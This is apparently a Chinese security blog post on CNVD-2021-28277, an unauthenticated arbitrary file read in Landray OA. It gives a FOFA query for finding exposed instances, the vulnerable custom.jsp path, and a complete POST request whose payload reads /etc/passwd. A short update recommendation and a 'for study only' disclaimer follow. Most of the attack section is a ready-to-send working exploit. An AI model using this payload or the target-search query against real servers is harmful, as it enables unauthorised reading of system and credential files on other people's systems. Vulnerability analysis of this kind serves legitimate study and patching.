近期CNVD爆出漏洞編號:CNVD-2021-28277,首次公開日期為2021-04-15,藍凌oa存在多個漏洞,攻擊者可利用該漏洞獲取服務器控制權。今天挑選一個藍凌OA前台任意文件讀取漏洞進行分析使用。鏈接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277
藍凌簡介:藍凌軟件全稱深圳市藍凌軟件股份有限公司,於2001年在深圳科技園成立。藍凌是國內知名的大平台OA服務商和國內領先的知識管理解決方案提供商,是專業從事組織的知識化咨詢、軟件研發、實施、技術服務的國家級高新技術企業,近期Landray-OA系統被爆出存任意文件讀取漏洞。
一、漏洞位置
FOFA網絡空間引擎,FOFA語法:app="Landray-OA系統"

打開測試網站前台登錄頁面:

漏洞的路徑在 xxxxx/sys/ui/extend/varkind/custom.jsp下面,也就是custom.jsp里面,需要使用post請求方式,請求的參數為 var={"body":{"file":"file:///etc/passwd"}}
使用hackbar火狐插件修改為post請求傳遞參數,打開 xxxxx/sys/ui/extend/varkind/custom.jsp為如下畫面顯示

二、漏洞驗證
可以看見,只需對file里面的參數進行修改,就可以任意讀取系統文件passwd信息的高危漏洞;
或者使用burp測試:

漏洞payload為
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
var={"body":{"file":"file:///etc/passwd"}}
修復建議:建議使用藍凌OA的系統更新系統至最新版本,附錄地址:https://www.landray.com.cn/
特別聲明:
由於傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,我不為此承擔任何責任。
作者有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經作者的允許,不得任意修改或者增減此文章內容,不得以任何方式將其用於商業目的。 切勿用於非法,僅供學習參考
